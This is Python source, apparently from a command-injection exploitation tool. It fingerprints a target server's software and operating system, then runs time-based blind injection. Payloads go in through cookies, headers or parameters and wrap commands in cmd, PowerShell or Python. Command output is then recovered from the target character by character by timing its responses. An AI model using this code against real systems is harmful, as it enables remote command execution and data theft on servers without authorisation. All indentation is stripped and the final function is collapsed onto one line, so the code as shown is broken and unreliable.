def server_identification(server_banner):
found_server_banner = False
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Identifying the target server. "
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
for i in range(0,len(settings.SERVER_BANNERS)):
match = re.search(settings.SERVER_BANNERS[i].lower(), server_banner.lower())
if match:
if settings.VERBOSITY_LEVEL != 0:
print(settings.SPACE)
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "The target server identified as "
debug_msg += server_banner + Style.RESET_ALL + "."
print(settings.print_bold_debug_msg(debug_msg))
settings.SERVER_BANNER = match.group(0)
found_server_banner = True
# Set up default root paths
if "apache" in settings.SERVER_BANNER.lower():
if settings.TARGET_OS == "win":
settings.WEB_ROOT = "\\htdocs"
else:
settings.WEB_ROOT = "/var/www"
elif "nginx" in settings.SERVER_BANNER.lower():
settings.WEB_ROOT = "/usr/share/nginx"
elif "microsoft-iis" in settings.SERVER_BANNER.lower():
settings.WEB_ROOT = "\\inetpub\\wwwroot"
break
else:
if settings.VERBOSITY_LEVEL != 0:
print(settings.SPACE)
warn_msg = "The server which identified as '"
warn_msg += server_banner + "' seems unknown."
print(settings.print_warning_msg(warn_msg))
def application_identification(url):
found_application_extension = False
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Identifying the target application."
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
root, application_extension = splitext(_urllib.parse.urlparse(url).path)
settings.TARGET_APPLICATION = application_extension[1:].upper()
if settings.TARGET_APPLICATION:
found_application_extension = True
if settings.VERBOSITY_LEVEL != 0:
print(settings.SPACE)
debug_msg = "The target application identified as "
debug_msg += settings.TARGET_APPLICATION + Style.RESET_ALL + "."
print(settings.print_bold_debug_msg(debug_msg))
# Check for unsupported target applications
for i in range(0,len(settings.UNSUPPORTED_TARGET_APPLICATION)):
if settings.TARGET_APPLICATION.lower() in settings.UNSUPPORTED_TARGET_APPLICATION[i].lower():
err_msg = settings.TARGET_APPLICATION + " exploitation is not yet supported."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
if not found_application_extension:
if settings.VERBOSITY_LEVEL != 0:
print(settings.SPACE)
warn_msg = "Heuristics have failed to identify target application."
print(settings.print_warning_msg(warn_msg))
def technology_detection(response):
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Identifying the technology supporting the target application. "
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
print(settings.SPACE)
if response.info()['X-Powered-By']:
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "The target application is powered by "
debug_msg += response.info()['X-Powered-By'] + Style.RESET_ALL + "."
print(settings.print_bold_debug_msg(debug_msg))
else:
if settings.VERBOSITY_LEVEL != 0:
warn_msg = "Heuristics have failed to identify the technology supporting the target application."
print(settings.print_warning_msg(warn_msg))
def encoding_detection(response):
if not menu.options.encoding:
charset_detected = False
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Identifying the indicated web-page charset. "
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
try:
# Detecting charset
try:
# Support for python 2.7.x
charset = response.headers.getparam('charset')
except AttributeError:
# Support for python 3.x
charset = response.headers.get_content_charset()
if charset != None and len(charset) != 0 :
charset_detected = True
else:
content = re.findall(r"charset=['\"](.*)['\"]", response.read())[0]
if len(content) != 0 :
charset = content
charset_detected = True
else:
# Check if HTML5 format
charset = re.findall(r"charset=['\"](.*?)['\"]", response.read())[0]
if len(charset) != 0 :
charset_detected = True
# Check the identifyied charset
if charset_detected :
settings.DEFAULT_PAGE_ENCODING = charset
if settings.VERBOSITY_LEVEL != 0:
print(settings.SPACE)
if settings.DEFAULT_PAGE_ENCODING.lower() not in settings.ENCODING_LIST:
warn_msg = "The indicated web-page charset " + settings.DEFAULT_PAGE_ENCODING + " seems unknown."
print(settings.print_warning_msg(warn_msg))
else:
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "The indicated web-page charset appears to be "
debug_msg += settings.DEFAULT_PAGE_ENCODING + Style.RESET_ALL + "."
print(settings.print_bold_debug_msg(debug_msg))
else:
pass
except:
pass
if charset_detected == False and settings.VERBOSITY_LEVEL != 0:
print(settings.SPACE)
warn_msg = "Heuristics have failed to identify indicated web-page charset."
print(settings.print_warning_msg(warn_msg))
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response):
if settings.TARGET_OS == "win":
previous_cmd = cmd
if alter_shell:
cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
else:
cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"
if menu.options.file_write or menu.options.file_upload:
minlen = 0
else:
minlen = 1
found_chars = False
info_msg = "Retrieving the length of execution output. "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
if settings.VERBOSITY_LEVEL > 1:
print("")
for output_length in range(int(minlen), int(maxlen)):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
payload_msg = payload.replace("\n", "\\n")
sys.stdout.write("\n" + settings.print_payload(payload_msg))
# Check if defined "--verbose" option.
elif settings.VERBOSITY_LEVEL >= 2:
debug_msg = "Generating payload for the injection."
print(settings.print_debug_msg(debug_msg))
payload_msg = payload.replace("\n", "\\n")
sys.stdout.write(settings.print_payload(payload_msg) + "\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
how_long = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
how_long = custom_header_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)
# Examine time-responses
injection_check = False
if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
injection_check = True
if injection_check == True:
if output_length > 1:
if settings.VERBOSITY_LEVEL >= 1:
pass
else:
sys.stdout.write(settings.SUCCESS_STATUS + "\n")
sys.stdout.flush()
if settings.VERBOSITY_LEVEL == 1:
print("")
if settings.VERBOSITY_LEVEL >= 1:
debug_msg = "Retrieved the length of execution output: " + str(output_length)
print(settings.print_bold_debug_msg(debug_msg))
else:
sub_content = "Retrieved: " + str(output_length)
print(settings.print_sub_content(sub_content))
found_chars = True
injection_check = False
break
# Proceed with the next (injection) step!
if found_chars == True :
if settings.TARGET_OS == "win":
cmd = previous_cmd
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = "0.0%"
info_msg = "Presuming the execution output."
if menu.options.verbose < 1 :
info_msg += ".. (" + str(percent) + ")"
elif menu.options.verbose == 1 :
info_msg += ""
else:
info_msg += "\n"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
char_pool = checks.generate_char_pool(num_of_chars)
for ascii_char in char_pool:
if alter_shell:
# Get the execution output, of shell execution.
payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
else:
# Get the execution output, of shell execution.
payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
payload_msg = payload.replace("\n", "\\n")
sys.stdout.write("\n" + settings.print_payload(payload_msg))
# Check if defined "--verbose" option.
elif settings.VERBOSITY_LEVEL >= 2:
debug_msg = "Generating payload for the injection."
print(settings.print_debug_msg(debug_msg))
payload_msg = payload.replace("\n", "\\n")
sys.stdout.write(settings.print_payload(payload_msg) + "\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
how_long = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
how_long = custom_header_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)
# Examine time-responses
injection_check = False
if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
injection_check = True
if injection_check == True:
if settings.VERBOSITY_LEVEL == 0:
output.append(chr(ascii_char))
percent = ((num_of_chars*100)/output_length)
float_percent = str("{0:.1f}".format(round(((num_of_chars * 100)/(output_length * 1.0)),2))) + "%"
if percent == 100:
float_percent = settings.SUCCESS_MSG
else:
float_percent = ".. (" + str(float_percent) + ")"
info_msg = "Presuming the execution output."
info_msg += float_percent
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
else:
output.append(chr(ascii_char))
injection_check = False
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
# Check for empty output.
if output == (len(output) * " "):
output = ""
else:
check_start = 0
if settings.VERBOSITY_LEVEL == 0:
sys.stdout.write(settings.FAIL_STATUS)
sys.stdout.flush()
else:
pass
#print("")
check_how_long = 0
output = False
if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session:
print("")
return check_how_long, output
def check_target_os(server_banner):
found_os_server = False
if menu.options.os and checks.user_defined_os():
user_defined_os = settings.TARGET_OS
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Identifying the target operating system. "
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
# Procedure for target OS identification.
for i in range(0,len(settings.SERVER_OS_BANNERS)):
match = re.search(settings.SERVER_OS_BANNERS[i].lower(), server_banner.lower())
if match:
found_os_server = True
settings.TARGET_OS = match.group(0)
match = re.search(r"microsoft|win", settings.TARGET_OS)
if match:
identified_os = "Windows"
if menu.options.os and user_defined_os != "win":
if not checks.identified_os():
settings.TARGET_OS = user_defined_os
settings.TARGET_OS = identified_os[:3].lower()
if menu.options.shellshock:
err_msg = "The shellshock module is not available for "
err_msg += identified_os + " targets."
print(settings.print_critical_msg(err_msg))
raise SystemExit()
else:
identified_os = "Unix-like (" + settings.TARGET_OS + ")"
if menu.options.os and user_defined_os == "win":
if not checks.identified_os():
settings.TARGET_OS = user_defined_os
if settings.VERBOSITY_LEVEL != 0 :
if found_os_server:
print(settings.SPACE)
debug_msg = "The target operating system appears to be "
debug_msg += identified_os.title() + Style.RESET_ALL + "."
print(settings.print_bold_debug_msg(debug_msg))
else:
print(settings.SPACE)
warn_msg = "Heuristics have failed to identify server's operating system."
print(settings.print_warning_msg(warn_msg))
if found_os_server == False and not menu.options.os:
# If "--shellshock" option is provided then,
# by default is a Linux/Unix operating system.
if menu.options.shellshock:
pass
else:
if menu.options.batch:
if not settings.CHECK_BOTH_OS:
settings.CHECK_BOTH_OS = True
check_type = "unix-based"
elif settings.CHECK_BOTH_OS:
settings.TARGET_OS = "win"
settings.CHECK_BOTH_OS = False
settings.PERFORM_BASIC_SCANS = True
check_type = "windows-based"
info_msg = "Setting the " + check_type + " payloads."
print(settings.print_info_msg(info_msg))
else:
while True:
question_msg = "Do you recognise the server's operating system? "
question_msg += "[(W)indows/(U)nix/(q)uit] > "
got_os = _input(settings.print_question_msg(question_msg))
if got_os.lower() in settings.CHOICE_OS :
if got_os.lower() == "w":
settings.TARGET_OS = "win"
break
elif got_os.lower() == "u":
break
elif got_os.lower() == "q":
raise SystemExit()
else:
err_msg = "'" + got_os + "' is not a valid answer."
print(settings.print_error_msg(err_msg))
pass
def total_of_requests(): debug_msg = "Identified the following injection point with " debug_msg += "a total of " + str(settings.TOTAL_OF_REQUESTS) + " HTTP(S) requests." print(settings.print_bold_debug_msg(debug_msg))
